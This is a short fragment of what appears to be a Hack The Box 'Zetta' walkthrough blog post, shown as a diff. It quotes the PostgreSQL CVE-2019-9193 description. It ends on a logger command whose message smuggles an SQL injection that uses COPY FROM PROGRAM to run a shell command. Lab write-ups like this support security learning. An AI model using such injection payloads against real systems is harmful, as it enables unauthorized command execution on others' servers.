limbernie/limbernie.github.io/_posts/2020-02-23-zetta-htb-walkthrough.md

 >  In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user.

 Armed with the previous insight, we can probably make use of [CVE-2019-9193](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9193) to execute commands.
-Let\'s see if this version is "vulnerable". :laughing:
+Let's see if this version is "vulnerable". :laughing:

 ```
 $ logger -s -p local7.info "', now()); DROP TABLE IF EXISTS cmd; CREATE TABLE cmd(out TEXT); COPY cmd FROM PROGRAM \$cmd\$rm /tmp/moss\$cmd\$; --"